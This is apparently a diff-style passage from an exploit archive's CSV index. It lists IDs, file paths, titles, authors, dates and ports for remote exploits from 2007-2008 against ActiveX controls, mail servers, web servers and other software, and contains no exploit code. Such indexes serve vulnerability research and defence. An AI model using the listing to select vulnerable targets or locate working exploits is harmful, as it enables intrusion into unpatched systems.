-3938,exploits/windows/remote/3938.html,"PrecisionID Barcode ActiveX 1.9 - Arbitrary File Overwrite",2007-05-16,shinnai,windows,remote, -3950,exploits/windows/remote/3950.html,"LeadTools JPEG 2000 - COM Object Remote Stack Overflow",2007-05-18,shinnai,windows,remote, -3951,exploits/windows/remote/3951.html,"LeadTools Thumbnail Browser Control - 'lttmb14E.ocx' Remote Buffer Overflow",2007-05-18,shinnai,windows,remote, -3952,exploits/windows/remote/3952.html,"LeadTools Raster Thumbnail Object Library - 'LTRTM14e.dll' Remote Buffer Overflow",2007-05-18,shinnai,windows,remote, -3954,exploits/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 - Authentication Bypass",2007-05-19,"Ahmed Siddiqui",windows,remote,69 -3961,exploits/windows/remote/3961.html,"LeadTools Raster Variant - 'LTRVR14e.dll' Remote File Overwrite",2007-05-21,shinnai,windows,remote, -3966,exploits/windows/remote/3966.php,"Pegasus ImagN - ActiveX Control Remote Buffer Overflow",2007-05-21,rgod,windows,remote, -3967,exploits/windows/remote/3967.html,"Virtual CD 9.0.0.2 - 'vc9api.DLL' Remote Shell Commands Execution",2007-05-21,rgod,windows,remote, -3968,exploits/windows/remote/3968.html,"KSign KSignSWAT 2.0.3.3 - ActiveX Control Remote Buffer Overflow",2007-05-22,"KIM Kee-hong",windows,remote, -3982,exploits/windows/remote/3982.html,"Dart Communications PowerTCP - Service Control Remote Buffer Overflow",2007-05-24,rgod,windows,remote, -3984,exploits/windows/remote/3984.html,"Dart Communications PowerTCP - ZIP Compression Remote Buffer Overflow",2007-05-25,rgod,windows,remote, -3993,exploits/windows/remote/3993.html,"Microsoft Internet Explorer 6 / Ademco co. ltd. ATNBaseLoader100 Module - Remote Buffer Overflow",2007-05-26,rgod,windows,remote, -3996,exploits/windows/remote/3996.c,"Apache 2.0.58 mod_rewrite (Windows 2003) - Remote Overflow",2007-05-26,fabio/b0x,windows,remote,80 -4008,exploits/windows/remote/4008.html,"Zenturi ProgramChecker - ActiveX File Download/Overwrite",2007-05-30,shinnai,windows,remote, -4010,exploits/windows/remote/4010.html,"EDraw Office Viewer Component - Unsafe Method",2007-05-30,shinnai,windows,remote, -4014,exploits/windows/remote/4014.py,"Eudora 7.1.0.9 - IMAP FLAGS Remote Overwrite (SEH)",2007-05-30,h07,windows,remote, -4015,exploits/windows/remote/4015.html,"Vivotek Motion Jpeg Control - 'MjpegDecoder.dll 2.0.0.13' Remote Overflow",2007-05-31,rgod,windows,remote, -4016,exploits/windows/remote/4016.sh,"Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass",2007-05-31,Sha0,windows,remote, -4021,exploits/windows/remote/4021.html,"Zenturi ProgramChecker - ActiveX 'sasatl.dll' Remote Buffer Overflow",2007-06-01,shinnai,windows,remote, -4023,exploits/windows/remote/4023.html,"Microsoft Internet Explorer 6 / Provideo Camimage - 'ISSCamControl.dll 1.0.1.5' Remote Buffer Overflow",2007-06-02,rgod,windows,remote, -4027,exploits/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - Unauthenticated Remote Overflow (Egghunter)",2007-06-03,muts,windows,remote,8080 -4032,exploits/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration",2007-06-04,bunker,tru64,remote, -4042,exploits/windows/remote/4042.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow",2007-06-07,Excepti0n,windows,remote, -4043,exploits/windows/remote/4043.html,"Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow (2)",2007-06-07,Excepti0n,windows,remote, -4045,exploits/windows/remote/4045.py,"Microsoft Windows - Animated Cursor Stack Overflow",2007-06-07,"RISE Security",windows,remote, -4049,exploits/windows/remote/4049.html,"Zenturi ProgramChecker - ActiveX Multiple Insecure Methods",2007-06-08,shinnai,windows,remote, -4050,exploits/windows/remote/4050.html,"Zenturi ProgramChecker - 'ActiveX NavigateUrl()' Insecure Method",2007-06-08,shinnai,windows,remote, -4052,exploits/windows/remote/4052.c,"Yahoo! Messenger Webcam 8.1 - 'Ywcvwr.dll' Download / Execute",2007-06-08,Excepti0n,windows,remote, -4053,exploits/windows/remote/4053.c,"Yahoo! Messenger Webcam 8.1 - 'Ywcupl.dll' Download / Execute",2007-06-08,Excepti0n,windows,remote, -4060,exploits/windows/remote/4060.html,"TEC-IT TBarCode - OCX ActiveX Arbitrary File Overwrite",2007-06-12,shinnai,windows,remote, -4061,exploits/windows/remote/4061.html,"Apple Safari 3 for Windows Beta - Remote Command Execution (PoC)",2007-06-12,"Thor Larholm",windows,remote, -4065,exploits/windows/remote/4065.html,"Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow (MS07-033)",2007-06-13,rgod,windows,remote, -4066,exploits/windows/remote/4066.html,"Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow (MS07-033)",2007-06-13,rgod,windows,remote, -4087,exploits/linux/remote/4087.c,"BitchX 1.1-final - 'EXEC' Remote Command Execution",2007-06-21,clarity_,linux,remote, -4093,exploits/multiple/remote/4093.pl,"Apache mod_jk 1.2.19/1.2.20 - Remote Buffer Overflow",2007-06-22,eliteboy,multiple,remote,80 -4094,exploits/windows/remote/4094.html,"RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Overflow",2007-06-22,callAX,windows,remote, -4101,exploits/windows/remote/4101.html,"NCTAudioEditor2 ActiveX DLL 'NCTWMAFile2.dll 2.6.2.157' - File Write",2007-06-25,shinnai,windows,remote, -4109,exploits/windows/remote/4109.html,"NCTAudioStudio2 - ActiveX DLL 2.6.1.148 'CreateFile()'/ Insecure Method",2007-06-26,shinnai,windows,remote, -4110,exploits/windows/remote/4110.html,"Avax Vector 'Avaxswf.dll' 1.0.0.1 - ActiveX Arbitrary Data Write",2007-06-26,callAX,windows,remote, -4119,exploits/windows/remote/4119.html,"HP Digital Imaging 'hpqxml.dll 2.0.0.133' - Arbitrary Data Write",2007-06-27,callAX,windows,remote, -4123,exploits/windows/remote/4123.html,"AMX Corp. VNC ActiveX Control - 'AmxVnc.dll 1.0.13.0' Remote Buffer Overflow",2007-06-28,rgod,windows,remote, -4143,exploits/windows/remote/4143.html,"AXIS Camera Control (AxisCamControl.ocx 1.0.2.15) - Remote Buffer Overflow",2007-07-03,shinnai,windows,remote, -4146,exploits/windows/remote/4146.cpp,"ESRI ArcSDE 9.0 < 9.2sp1 - Remote Buffer Overflow",2007-07-03,Heretic2,windows,remote,5151 -4152,exploits/windows/remote/4152.py,"ViRC 2.0 - JOIN Response Remote Overwrite (SEH)",2007-07-06,h07,windows,remote, -4155,exploits/windows/remote/4155.html,"HP Digital Imaging 'hpqvwocx.dll 2.1.0.556' - 'SaveToFile()' File Write",2007-07-06,shinnai,windows,remote, -4157,exploits/windows/remote/4157.cpp,"SAP DB 7.4 - WebTools Remote Overwrite (SEH)",2007-07-07,Heretic2,windows,remote,9999 -4158,exploits/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX 'TraceTarget()' Remote Buffer Overflow",2007-07-07,nitr0us,windows,remote, -4160,exploits/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods",2007-07-07,shinnai,windows,remote, -4162,exploits/linux/remote/4162.c,"Apache Tomcat Connector mod_jk - 'exec-shield' Remote Overflow",2007-07-08,Xpl017Elz,linux,remote,80 -4170,exploits/windows/remote/4170.html,"Program Checker - 'sasatl.dll 1.5.0.531' JavaScript HeapSpray",2007-07-10,callAX,windows,remote, -4176,exploits/windows/remote/4176.html,"SecureBlackbox 'PGPBBox.dll 5.1.0.112' - Arbitrary Data Write",2007-07-12,callAX,windows,remote, -4177,exploits/windows/remote/4177.html,"Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog HeapSpray",2007-07-12,callAX,windows,remote, -4188,exploits/windows/remote/4188.txt,"Flash Player/Plugin Video - File Parsing Remote Code Execution (PoC)",2007-07-16,yunshu,windows,remote, -4190,exploits/windows/remote/4190.html,"Data Dynamics ActiveBar - ActiveX 'actbar3.ocx 3.1' Insecure Methods",2007-07-17,shinnai,windows,remote, -4200,exploits/windows/remote/4200.html,"Versalsoft HTTP File Uploader - 'AddFile()' Remote Buffer Overflow",2007-07-19,shinnai,windows,remote, -4207,exploits/windows/remote/4207.py,"Lotus Domino IMAP4 Server 6.5.4 - Remote Buffer Overflow",2007-07-20,"dmc & prdelka",windows,remote,143 -4208,exploits/windows/remote/4208.html,"Data Dynamics ActiveReport - ActiveX 'actrpt2.dll 2.5' Insecure Method",2007-07-21,shinnai,windows,remote, -4214,exploits/windows/remote/4214.html,"Zenturi NixonMyPrograms Class 'sasatl.dll 1.5.0.531' - Remote Buffer Overflow",2007-07-23,shinnai,windows,remote, -4217,exploits/windows/remote/4217.html,"LinkedIn Toolbar 3.0.2.1098 - Remote Buffer Overflow",2007-07-24,"Jared DeMott",windows,remote, -4222,exploits/windows/remote/4222.c,"Microsoft Windows RSH daemon 1.7 - Remote Buffer Overflow",2007-07-24,"Joey Mengele",windows,remote,514 -4223,exploits/windows/remote/4223.pl,"IPSwitch IMail Server 2006 - SEARCH Remote Stack Overflow",2007-07-25,ZhenHan.Liu,windows,remote,143 -4226,exploits/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 - Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote, -4228,exploits/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow",2007-07-26,ZhenHan.Liu,windows,remote,143 -4230,exploits/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Remote Delete File",2007-07-26,h07,windows,remote, -4234,exploits/windows/remote/4234.html,"mlsrvx.dll 1.8.9.1 ArGoSoft Mail Server - Data Write/Code Execution",2007-07-27,callAX,windows,remote, -4237,exploits/windows/remote/4237.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Command Execution",2007-07-27,h07,windows,remote, -4240,exploits/windows/remote/4240.html,"VMware 'IntraProcessLogging.dll' 5.5.3.42958 - Arbitrary Data Write",2007-07-28,callAX,windows,remote, -4243,exploits/linux/remote/4243.c,"CoreHTTP 0.5.3alpha - HTTPd Remote Buffer Overflow",2007-07-29,vade79,linux,remote,80 -4244,exploits/windows/remote/4244.html,"VMware Inc 6.0.0 - 'vielib.dll 2.2.5.42958' Remode Code Execution",2007-07-29,callAX,windows,remote, -4245,exploits/windows/remote/4245.html,"VMware Inc 6.0.0 - CreateProcess Remote Code Execution",2007-07-30,callAX,windows,remote, -4247,exploits/windows/remote/4247.c,"Borland Interbase 2007 SP1 - Create-Request Remote Overflow",2007-07-30,BackBone,windows,remote,3050 -4250,exploits/windows/remote/4250.html,"Yahoo! Widget < 4.0.5 - 'GetComponentVersion()' Remote Overflow",2007-07-31,lhoang8500,windows,remote, -4255,exploits/windows/remote/4255.html,"CHILKAT ASP String - 'CkString.dll 1.1 SaveToFile()' Insecure Method",2007-08-05,shinnai,windows,remote, -4259,exploits/windows/remote/4259.txt,"Microsoft Visual 6 - 'VDT70.dll NotSafe' Remote Stack Overflow",2007-08-06,DeltahackingTEAM,windows,remote, -4266,exploits/multiple/remote/4266.py,"BIND 9 0.3beta - DNS Cache Poisoning",2007-08-07,posedge,multiple,remote, -4279,exploits/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - 'SourceUrl' ActiveX Remote Code Execution",2007-08-10,h07,windows,remote, -4280,exploits/windows/remote/4280.pl,"Savant Web Server 3.1 - GET Universal Remote Overflow",2007-08-12,"Jacopo Cervini",windows,remote,80 -4283,exploits/windows/remote/4283.pl,"Racer 0.5.3 Beta 5 - Remote Buffer Overflow",2007-08-13,n00b,windows,remote,26000 -4287,exploits/windows/remote/4287.py,"Surgemail 38k - 'Search' Remote Buffer Overflow",2007-08-14,"Joey Mengele",windows,remote,143 -4290,exploits/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 - HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote, -4292,exploits/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,windows,remote, -4299,exploits/windows/remote/4299.html,"eCentrex VOIP Client module - 'uacomx.ocx 2.0.1' Remote Buffer Overflow",2007-08-21,rgod,windows,remote, -4301,exploits/windows/remote/4301.cpp,"Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25 -4312,exploits/linux/remote/4312.c,"ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow",2007-08-24,netris,linux,remote,21 -4315,exploits/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389 -4316,exploits/windows/remote/4316.cpp,"Mercury/32 Mail Server 3.32 < 4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25 -4321,exploits/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,linux,remote, -4322,exploits/windows/remote/4322.html,"NVR SP2 2.0 'nvUnifiedControl.dll 1.1.45.0' - 'SetText()' Command Execution",2007-08-28,shinnai,windows,remote, -4323,exploits/windows/remote/4323.html,"NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'SaveXMLFile()' Insecure Method",2007-08-27,shinnai,windows,remote, -4324,exploits/windows/remote/4324.html,"NVR SP2 2.0 'nvUtility.dll 1.0.14.0' - 'DeleteXMLFile()' Insecure Method",2007-08-27,shinnai,windows,remote, -4328,exploits/windows/remote/4328.html,"Postcast Server Pro 3.0.61 / Quiksoft EasyMail - 'emsmtp.dll 6.0.1' Remote Buffer Overflow",2007-08-28,rgod,windows,remote, -4334,exploits/windows/remote/4334.txt,"Microsoft MSN Messenger 7.x/8.0? - Video Remote Heap Overflow",2007-08-29,wushi,windows,remote, -4348,exploits/windows/remote/4348.c,"PPStream - 'PowerPlayer.dll 2.0.1.3829' ActiveX Remote Overflow",2007-08-31,dummy,windows,remote, -4351,exploits/windows/remote/4351.html,"Yahoo! Messenger - 'YVerInfo.dll 2007.8.27.1' ActiveX Buffer Overflow",2007-09-01,minhbq,windows,remote, -4357,exploits/windows/remote/4357.html,"Telecom Italy Alice Messenger - Remote Registry Key Manipulation",2007-09-03,rgod,windows,remote, -4360,exploits/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)",2007-09-03,"Patrick Webster",windows,remote, -4362,exploits/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Traversal",2007-09-04,Katatafish,linux,remote, -4366,exploits/windows/remote/4366.html,"GlobalLink 2.7.0.8 - 'glItemCom.dll SetInfo()' Heap Overflow",2007-09-05,void,windows,remote, -4367,exploits/windows/remote/4367.c,"Trend Micro ServerProtect - 'eng50.dll' Remote Stack Overflow",2007-09-06,devcode,windows,remote, -4372,exploits/windows/remote/4372.html,"GlobalLink 2.7.0.8 - 'glitemflat.dll SetClientInfo()' Heap Overflow",2007-09-07,void,windows,remote, -4388,exploits/windows/remote/4388.html,"Ultra Crypto Component - 'CryptoX.dll 2.0 SaveToFile()' Insecure Method",2007-09-10,shinnai,windows,remote, -4389,exploits/windows/remote/4389.html,"Ultra Crypto Component - 'CryptoX.dll 2.0' Remote Buffer Overflow",2007-09-10,shinnai,windows,remote, -4391,exploits/multiple/remote/4391.c,"Lighttpd 1.4.16 - FastCGI Header Overflow Remote Command Execution",2007-09-10,"Mattias Bengtsson",multiple,remote, -4393,exploits/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - 'PDWizard.ocx' Remote Command Execution",2007-09-11,shinnai,windows,remote, -4394,exploits/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - 'VBTOVSI.dll 1.0.0.0' File Overwrite",2007-09-11,shinnai,windows,remote, -4398,exploits/windows/remote/4398.html,"Microsoft SQL Server - Distributed Management Objects Buffer Overflow",2007-09-12,96sysim,windows,remote, -4399,exploits/multiple/remote/4399.html,"Apple QuickTime (Multiple Browsers) - Command Execution (PoC)",2007-09-12,pdp,multiple,remote, -4420,exploits/windows/remote/4420.html,"MW6 Technologies QRCode ActiveX 3.0 - Remote File Overwrite",2007-09-18,shinnai,windows,remote, -4424,exploits/windows/remote/4424.html,"Apple QuickTime /w IE .qtl Version XAS - Remote (PoC)",2007-09-18,"Aviv Raff",windows,remote, -4427,exploits/windows/remote/4427.html,"jetAudio 7.x - ActiveX 'DownloadFromMusicStore()' Code Execution",2007-09-19,h07,windows,remote, -4428,exploits/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 - CYFT Object Arbitrary File Download",2007-09-19,shinnai,windows,remote, -4429,exploits/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD - 'SEARCH' Authenticated Overflow",2007-09-19,void,windows,remote,143 -4437,exploits/linux/remote/4437.c,"Lighttpd 1.4.17 - FastCGI Header Overflow Arbitrary Code Execution",2007-09-20,Andi,linux,remote,80 -4438,exploits/windows/remote/4438.cpp,"IPSwitch IMail Server 8.0x - Remote Heap Overflow",2007-09-21,axis,windows,remote,25 -4445,exploits/windows/remote/4445.html,"EasyMail MessagePrinter Object - 'emprint.dll 6.0.1.0' Remote Buffer Overflow",2007-09-23,rgod,windows,remote, -4450,exploits/windows/remote/4450.py,"Xitami Web Server 2.5 - 'If-Modified-Since' Remote Buffer Overflow",2007-09-24,h07,windows,remote,80 -4452,exploits/windows/remote/4452.html,"Ask.com/AskJeeves Toolbar Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow",2007-09-24,"Joey Mengele",windows,remote, -4453,exploits/windows/remote/4453.html,"EB Design Pty Ltd - 'EBCRYPT.dll 2.0' Multiple Remote Vulnerabilities",2007-09-24,shinnai,windows,remote, -4455,exploits/windows/remote/4455.pl,"Motorola Timbuktu Pro 8.6.5 - File Deletion/Creation",2008-03-11,titon,windows,remote, -4468,exploits/windows/remote/4468.html,"Tor < 0.1.2.16 - ControlPort Remote Rewrite",2007-09-29,elgCrew,windows,remote, -4478,exploits/linux/remote/4478.c,"smbftpd 0.96 - SMBDirList-function Remote Format String",2007-10-01,"Jerry Illikainen",linux,remote,21 -4484,exploits/windows/remote/4484.pl,"FSFDT v3.000 d9 - 'HELP' Remote Buffer Overflow",2007-10-04,weak,windows,remote, -4487,exploits/windows/remote/4487.html,"Pegasus Imaging ThumbnailXpress 1.0 - Arbitrary File Deletion",2007-10-05,shinnai,windows,remote, -4488,exploits/windows/remote/4488.html,"Pegasus Imaging ImagXpress 8.0 - Arbitrary File Overwrite",2007-10-05,shinnai,windows,remote, -4506,exploits/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 - 'FPOLE.OCX' Arbitrary Command Execution",2007-10-09,shinnai,windows,remote, -4514,exploits/linux/remote/4514.c,"Eggdrop Server Module Message Handling - Remote Buffer Overflow",2007-10-10,bangus/magnum,linux,remote, -4522,exploits/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak",2007-10-11,"Niacin & Dre",hardware,remote, -4526,exploits/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method",2007-10-12,Katatafish,windows,remote, -4530,exploits/multiple/remote/4530.pl,"Apache Tomcat - 'WebDAV' Remote File Disclosure",2007-10-14,eliteboy,multiple,remote, -4533,exploits/linux/remote/4533.c,"eXtremail 2.1.1 - 'LOGIN' Remote Stack Overflow",2007-10-15,mu-b,linux,remote,4501 -4534,exploits/linux/remote/4534.c,"eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow",2007-10-15,mu-b,linux,remote,143 -4537,exploits/linux/remote/4537.c,"Subversion 0.3.7/1.0.0 - Remote Buffer Overflow",2005-05-03,greuff,linux,remote, -4541,exploits/linux/remote/4541.c,"Half-Life Server 3.1.1.0 - Remote Buffer Overflow",2005-10-16,greuff,linux,remote,27015 -4542,exploits/linux/remote/4542.py,"Boa 0.93.15 - HTTP Basic Authentication Bypass",2007-10-16,ikki,linux,remote, -4552,exploits/linux/remote/4552.pl,"Apache Tomcat - WebDAV SSL Remote File Disclosure",2007-10-21,h3rcul3s,linux,remote, -4556,exploits/multiple/remote/4556.txt,"Litespeed Web Server 3.2.3 - Source Code Disclosure",2007-10-22,Tr3mbl3r,multiple,remote, -4566,exploits/windows/remote/4566.rb,"eIQnetworks ESA SEARCHREPORT - Remote Overflow (Metasploit)",2007-10-24,ri0t,windows,remote,10616 -4567,exploits/multiple/remote/4567.pl,"Jakarta Slide 2.1 RC1 - Remote File Disclosure",2007-10-24,kingcope,multiple,remote, -4573,exploits/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 - Express CAD Service Buffer Overflow",2007-10-27,muts,windows,remote,1581 -4574,exploits/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 - IMAP4 Server LSUB Command",2007-10-27,FistFuXXer,windows,remote,143 -4579,exploits/windows/remote/4579.html,"GOM Player 2.1.6.3499 - 'GomWeb3.dll 1.0.0.12' Remote Overflow",2007-10-29,rgod,windows,remote, -4594,exploits/windows/remote/4594.html,"SonicWALL SSL-VPN - 'NeLaunchCtrl' ActiveX Control Remote Command Execution",2007-11-01,krafty,windows,remote, -4598,exploits/windows/remote/4598.html,"EDraw Flowchart ActiveX Control 2.0 - Insecure Method",2007-11-02,shinnai,windows,remote, -4616,exploits/windows/remote/4616.pl,"Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,windows,remote, -4651,exploits/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 (Windows Vista/XP) - RSTP Response Code Execution",2007-11-24,InTeL,windows,remote, -4657,exploits/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal",2007-11-26,muts,windows,remote, -4663,exploits/windows/remote/4663.html,"BitDefender Online Scanner 8 - ActiveX Heap Overflow",2007-11-27,Nphinity,windows,remote, -4664,exploits/windows/remote/4664.txt,"Apple QuickTime 7.2/7.3 - RSTP Response Universal",2007-11-27,"YAG KOHHA",windows,remote, -4673,exploits/multiple/remote/4673.rb,"Apple QuickTime 7.2/7.3 (OSX/Windows) - RSTP Response Universal",2007-11-29,"Subreption LLC.",multiple,remote, -4699,exploits/windows/remote/4699.txt,"firefly media server (mt-daapd) 2.4.1 / svn 1699 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote, -4700,exploits/windows/remote/4700.txt,"Simple HTTPd 1.38 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote, -4713,exploits/windows/remote/4713.txt,"barracudadrive 3.7.2 - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote, -4715,exploits/windows/remote/4715.txt,"BadBlue 2.72b - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote, -4720,exploits/windows/remote/4720.html,"HP Compaq Notebooks - ActiveX Remote Code Execution",2007-12-11,porkythepig,windows,remote, -4724,exploits/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote Buffer Overflow",2007-12-12,muts,windows,remote,80 -4744,exploits/hardware/remote/4744.txt,"rooter VDSL Device - Goahead WebServer Disclosure",2007-12-18,NeoCoderz,hardware,remote, -4745,exploits/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)",2007-12-18,axis,windows,remote, -4746,exploits/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,windows,remote, -4747,exploits/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - 'ulang' Remote Command Execution",2007-12-18,rgod,windows,remote, -4754,exploits/win_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",win_x86,remote,3128 -4760,exploits/windows/remote/4760.txt,"Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote, -4761,exploits/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,multiple,remote,25 -4784,exploits/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",windows,remote,80 -4797,exploits/hardware/remote/4797.pl,"March Networks DVR 3204 - Logfile Information Disclosure",2007-12-27,"Alex Hernandez",hardware,remote, -4806,exploits/windows/remote/4806.html,"Persits Software XUpload Control - 'AddFolder()' Remote Buffer Overflow",2007-12-28,Elazar,windows,remote, -4818,exploits/windows/remote/4818.html,"IBM Domino Web Access 7.0 Upload Module - 'inotes6.dll' Remote Buffer Overflow",2007-12-30,Elazar,windows,remote, -4819,exploits/windows/remote/4819.html,"Macrovision Installshield - 'isusweb.dll' Overwrite (SEH)",2007-12-30,Elazar,windows,remote, -4820,exploits/windows/remote/4820.html,"IBM Domino Web Access Upload Module - 'dwa7w.dll' Remote Buffer Overflow",2007-12-30,Elazar,windows,remote, -4825,exploits/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 - API ActiveX Control Buffer Overflow",2007-12-31,Elazar,windows,remote, -4862,exploits/linux/remote/4862.py,"ClamAV 0.91.2 - libclamav MEW PE Buffer Overflow",2008-01-07,"Thomas Pollet",linux,remote, -4866,exploits/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing - Remote Stack Overflow",2008-01-08,ryujin,windows,remote, -4868,exploits/windows/remote/4868.html,"Move Networks Quantum Streaming Player - Remote Overflow (SEH)",2008-01-08,Elazar,windows,remote, -4869,exploits/windows/remote/4869.html,"Gateway Weblaunch - ActiveX Control Insecure Method",2008-01-08,Elazar,windows,remote, -4873,exploits/windows/remote/4873.html,"Microsoft FoxServer - 'vfp6r.dll 6.0.8862.0' ActiveX Command Execution",2008-01-09,shinnai,windows,remote, -4874,exploits/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0-SP6 - 'SaveFile()' Insecure Method",2008-01-09,shinnai,windows,remote, -4877,exploits/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Unauthenticated Remote Command Execution",2008-01-09,"Luigi Auriemma",multiple,remote,7210 -4894,exploits/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager - 'ccpm_0237.dll' Remote Buffer Overflow",2008-01-11,Elazar,windows,remote, -4903,exploits/windows/remote/4903.html,"NUVICO DVR NVDV4 / PdvrAtl Module 'PdvrAtl.DLL 1.0.1.25' - Remote Buffer Overflow",2008-01-13,rgod,windows,remote, -4906,exploits/windows/remote/4906.txt,"QuickTime Player 7.3.1.70 - 'RTSP' Remote Buffer Overflow (PoC)",2008-01-14,"Luigi Auriemma",windows,remote, -4909,exploits/windows/remote/4909.html,"Macrovision FlexNet DownloadManager - Insecure Methods",2008-01-14,Elazar,windows,remote, -4913,exploits/windows/remote/4913.html,"Macrovision FlexNet - 'isusweb.dll' DownloadAndExecute Method",2008-01-15,Elazar,windows,remote, -4918,exploits/windows/remote/4918.html,"RTS Sentry Digital Surveillance - 'CamPanel.dll 2.1.0.2' Remote Buffer Overflow",2008-01-16,rgod,windows,remote, -4923,exploits/windows/remote/4923.txt,"Miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote, -4932,exploits/windows/remote/4932.html,"Digital Data Communications - 'RtspVaPgCtrl' Class Remote Buffer Overflow",2008-01-17,rgod,windows,remote, -4934,exploits/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (2)",2008-01-18,"Marcin Kozlowski",windows,remote, -4941,exploits/hardware/remote/4941.txt,"Belkin F5D9230-4 Wireless G Plus MIMO Router - Authentication Bypass",2008-01-20,DarkFig,hardware,remote, -4946,exploits/windows/remote/4946.html,"Toshiba Surveillance - 'MeIpCamX.dll 1.0.0.4' Remote Buffer Overflow",2008-01-20,rgod,windows,remote, -4947,exploits/linux/remote/4947.c,"Axigen 5.0.2 - AXIMilter Remote Format String",2008-01-21,hempel,linux,remote, -4948,exploits/windows/remote/4948.txt,"Microsoft Windows RSH daemon 1.8 - Remote Buffer Overflow",2008-01-21,prdelka,windows,remote, -4949,exploits/windows/remote/4949.txt,"Citadel SMTP 7.10 - Remote Overflow",2008-01-21,prdelka,windows,remote,25 -4959,exploits/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control - Remote Buffer Overflow",2008-01-22,Elazar,windows,remote, -4967,exploits/windows/remote/4967.html,"Lycos FileUploader Control - ActiveX Remote Buffer Overflow",2008-01-22,Elazar,windows,remote, -4974,exploits/windows/remote/4974.html,"Comodo AntiVirus 2.0 - 'ExecuteStr()' Remote Command Execution",2008-01-23,h07,windows,remote, -4979,exploits/windows/remote/4979.html,"Move Networks Upgrade Manager Control - Remote Buffer Overflow",2008-01-24,Elazar,windows,remote, -4981,exploits/windows/remote/4981.html,"ImageShack Toolbar 4.5.7 - 'FileUploader' Class InsecureMethod (PoC)",2008-01-24,rgod,windows,remote, -4982,exploits/windows/remote/4982.html,"Gateway WebLaunch - ActiveX Remote Buffer Overflow",2008-01-25,Elazar,windows,remote, -4986,exploits/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' install Method",2008-01-25,plan-s,windows,remote, -4987,exploits/windows/remote/4987.html,"Persits XUpload 3.0 - 'AddFile()' Remote Buffer Overflow",2008-01-25,Elazar,windows,remote, -4999,exploits/windows/remote/4999.html,"MailBee Objects 5.5 - 'MailBee.dll' Remote Insecure Method",2008-01-28,darkl0rd,windows,remote, -5005,exploits/windows/remote/5005.html,"Chilkat Mail ActiveX 7.8 - 'ChilkatCert.dll' 